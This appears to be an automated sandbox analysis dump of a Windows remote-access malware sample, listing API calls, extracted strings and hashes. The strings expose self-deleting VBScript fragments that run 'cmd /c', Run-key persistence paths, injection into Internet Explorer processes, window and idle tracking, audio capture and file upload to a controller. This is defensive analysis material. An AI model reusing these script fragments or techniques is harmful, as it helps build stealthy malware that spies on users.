            • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
            • API String ID: 1861856835-1953526029
            • Opcode ID: 10d0c7ff4f1d806eef4ddcd080fba36a068473baf966d624ed17e78b73616814
            • Instruction ID: 20f5f97700cb48a3d0b4a42ff25d793d854bdbfc6fb2dd54058f707cc559a17d
            • Opcode Fuzzy Hash: 10d0c7ff4f1d806eef4ddcd080fba36a068473baf966d624ed17e78b73616814
            • Instruction Fuzzy Hash: 579180712042405AC314FB62D8929EF77E99F90708F50453FB586B31E3EE789E49C69E
            APIs
            • CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
            • ExitProcess.KERNEL32(00000000), ref: 00410F05
            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
            • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
            • CloseHandle.KERNEL32(00000000), ref: 00410FA0
            • GetCurrentProcessId.KERNEL32 ref: 00410FA6
            • PathFileExistsW.SHLWAPI(?), ref: 00410FD7
            • GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
            • lstrcatW.KERNEL32(?,.exe), ref: 00411066
              • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
            • Sleep.KERNEL32(000001F4), ref: 004110E7
            • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
            • CloseHandle.KERNEL32(00000000), ref: 0041110E
            • GetCurrentProcessId.KERNEL32 ref: 00411114
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
            • String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
            • API String ID: 2649220323-71629269
            • Opcode ID: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
            • Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
            • Opcode Fuzzy Hash: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
            • Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D
            APIs
              • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
              • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5
              • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
              • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
              • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
              • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
            • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
            • ExitProcess.KERNEL32 ref: 0040BFD7
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
            • String ID: ")$.vbs$05#v`#v$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
            • API String ID: 3797177996-1044233930
            • Opcode ID: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
            • Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
            • Opcode Fuzzy Hash: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
            • Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E
            APIs
            • _wcslen.LIBCMT ref: 0040B882
            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
            • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
            • _wcslen.LIBCMT ref: 0040B968
            • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000), ref: 0040B9E0
            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
            • _wcslen.LIBCMT ref: 0040BA25
            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
            • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
            • ExitProcess.KERNEL32 ref: 0040BC36
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
            • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
            • API String ID: 2743683619-2376316431
            • Opcode ID: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
            • Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
            • Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E
            APIs
            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
            • SetEvent.KERNEL32 ref: 004191CF
            • WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
            • CloseHandle.KERNEL32 ref: 004191F0
            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C
            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
            • API String ID: 738084811-1354618412
            • Opcode ID: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
            • Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
            • Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E
            APIs
            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
            • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
            • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
            • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
            • API ID: File$Write$Create
            • String ID: RIFF$WAVE$data$fmt
            • API String ID: 1602526932-4212202414
            • Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
            • Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
            • Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3
            APIs
            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
            • LoadLibraryA.KERNEL32(?), ref: 0041386D
            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
            • FreeLibrary.KERNEL32(00000000), ref: 00413894
            • LoadLibraryA.KERNEL32(?), ref: 004138CC
            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
            • FreeLibrary.KERNEL32(00000000), ref: 004138E5
            • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
            • FreeLibrary.KERNEL32(00000000), ref: 0041390B
            • API ID: Library$AddressFreeProc$Load$DirectorySystem
            • String ID: \ws2_32$\wship6$`3A$freeaddrinfo$getaddrinfo$getnameinfo
            • API String ID: 2490988753-3443138237
            • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
            • Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
            • Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE
            • API ID: _free$EnvironmentVariable$_wcschr
            • String ID:
            • API String ID: 3899193279-0
            • Opcode ID: 684045cb82c272c6e2ac36361ff8b964f23035e186c2d5dbd227a350b29f8928
            • Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
            • Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D
            APIs
            • ___free_lconv_mon.LIBCMT ref: 0044E4EA
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
            • _free.LIBCMT ref: 0044E4DF
              • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
              • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
            • _free.LIBCMT ref: 0044E501
            • _free.LIBCMT ref: 0044E516
            • _free.LIBCMT ref: 0044E521
            • _free.LIBCMT ref: 0044E543
            • _free.LIBCMT ref: 0044E556
            • _free.LIBCMT ref: 0044E564
            • _free.LIBCMT ref: 0044E56F
            • _free.LIBCMT ref: 0044E5A7
            • _free.LIBCMT ref: 0044E5AE
            • _free.LIBCMT ref: 0044E5CB
            • _free.LIBCMT ref: 0044E5E3
            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
            • String ID: pF
            • API String ID: 161543041-2973420481
            • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
            • Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
            • Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18
            APIs
            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
              • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
              • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
              • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
            • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
            • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
            • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
            • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
            • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
            • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
            • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
            • Sleep.KERNEL32(00000064), ref: 00411C63
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
            • String ID: /stext "$$.F$@#G$@#G
            • API String ID: 1223786279-2596709126
            • Opcode ID: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
            • Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
            • Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A
            • API ID: _free
            • String ID: pF
            • API String ID: 269201875-2973420481
            • Opcode ID: e28a4125cd182155f8106b0edc14aa680027b5eb54e98ed2c6064bdca11899c6
            • Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
            • Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754
            APIs
            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040DE79
            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23
              • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
            • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
            • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133
            • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
            • String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
            • API String ID: 193334293-3226144251
            • Opcode ID: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
            • Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
            • Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A
            APIs
            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
            • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
            • RegCloseKey.ADVAPI32(?), ref: 0041A749
            • API ID: CloseEnumOpen
            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
            • API String ID: 1332880857-3714951968
            • Opcode ID: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
            • Instruction ID: 699f57f5c891f1d806a7f6c627c3d9f808e7165cae3c76f1f7c8ebce292c0808
            • Instruction Fuzzy Hash: BC8152311183419BC328EB51D891EEFB7E8EF94348F10493FF586921E2EF749949CA5A
            APIs
            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
            • GetCursorPos.USER32(?), ref: 0041B39E
            • SetForegroundWindow.USER32(?), ref: 0041B3A7
            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
            • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
            • ExitProcess.KERNEL32 ref: 0041B41A
            • CreatePopupMenu.USER32 ref: 0041B420
            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
            • String ID: Close
            • API String ID: 1657328048-3535843008
            • Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
            • Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
            • Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59
            • API ID: _free$Info
            • String ID:
            • API String ID: 2509303402-0
            • Opcode ID: 543c517478803d648db1551973bdeb7e45e3e7bd29ee356e71c77ae2fe33fa89
            • Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
            • Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24
            APIs
            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
            • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
            • __aulldiv.LIBCMT ref: 00407D89
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
            • CloseHandle.KERNEL32(00000000), ref: 00407FA0
            • CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
            • CloseHandle.KERNEL32(00000000), ref: 00408038
            • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
            • API String ID: 3086580692-2596673759
            • Opcode ID: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
            • Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
            • Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B
            APIs
              • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
              • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
              • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
              • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
              • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
            • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
            • ExitProcess.KERNEL32 ref: 0040C57D
            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
            • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
            • API String ID: 1913171305-2600661426
            • Opcode ID: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
            • Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
            • Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99
            APIs
            • connect.WS2_32(?,?,?), ref: 004048C0
            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
            • WSAGetLastError.WS2_32 ref: 00404A01
              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
            • API ID: CreateEvent$ErrorLastLocalTimeconnect
            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
            • API String ID: 994465650-2151626615
            • Opcode ID: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
            • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
            • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF
            APIs
              • Part of subcall function 00452A89: CreateFileW.KERNEL32(?,00000008,00000007,d.E,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
            • __dosmaperr.LIBCMT ref: 00452ED6
            • GetFileType.KERNEL32(00000000), ref: 00452EE2
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
            • __dosmaperr.LIBCMT ref: 00452EF5
            • CloseHandle.KERNEL32(00000000), ref: 00452F15
            • CloseHandle.KERNEL32(00000000), ref: 0045305F
            • GetLastError.KERNEL32 ref: 00453091
            • __dosmaperr.LIBCMT ref: 00453098
            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
            • String ID: H
            • API String ID: 4237864984-2852464175
            • Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
            • Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
            • Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A
            • API ID:
            • String ID: 65535$udp
            • API String ID: 0-1267037602
            • Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
            • Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
            • Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E
            APIs
            • __Init_thread_footer.LIBCMT ref: 00409C81
            • Sleep.KERNEL32(000001F4), ref: 00409C8C
            • GetForegroundWindow.USER32 ref: 00409C92
            • GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
            • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
            • Sleep.KERNEL32(000003E8), ref: 00409D9D
              • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
            • String ID: [${ User has been idle for $ minutes }$]
            • API String ID: 911427763-3954389425
            • Opcode ID: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
            • Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
            • Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A
            APIs
            • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040C753
            • API ID: LongNamePath
            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
            • API String ID: 82841172-425784914
            • Opcode ID: 611eacb1f2b12eabfa35ce51232d41e6553fe8371d81c53e9ab5b340c3cd037e
            • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
            • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F
            APIs
            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
            • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
            • __dosmaperr.LIBCMT ref: 00438646
            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
            • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
            • __dosmaperr.LIBCMT ref: 00438683
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
            • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
            • __dosmaperr.LIBCMT ref: 004386D7
            • _free.LIBCMT ref: 004386E3
            • _free.LIBCMT ref: 004386EA
            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
            • String ID:
            • API String ID: 2441525078-0
            • Opcode ID: 754b37205d6cd88dea2e57a046153fac0b2c26eaf77bc51e198666fb1f449e95
            • Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
            • Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69
            • API ID: _free
            • String ID: pF$tF
            • API String ID: 269201875-2954683558
            • Opcode ID: fb15eab2332ee79fe3b6269c7a6798f30c580aa4b0380318a35312f844840a90
            • Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
            • Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58
            APIs
            • Sleep.KERNEL32(00001388), ref: 00409738
              • Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
              • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
              • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
              • Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
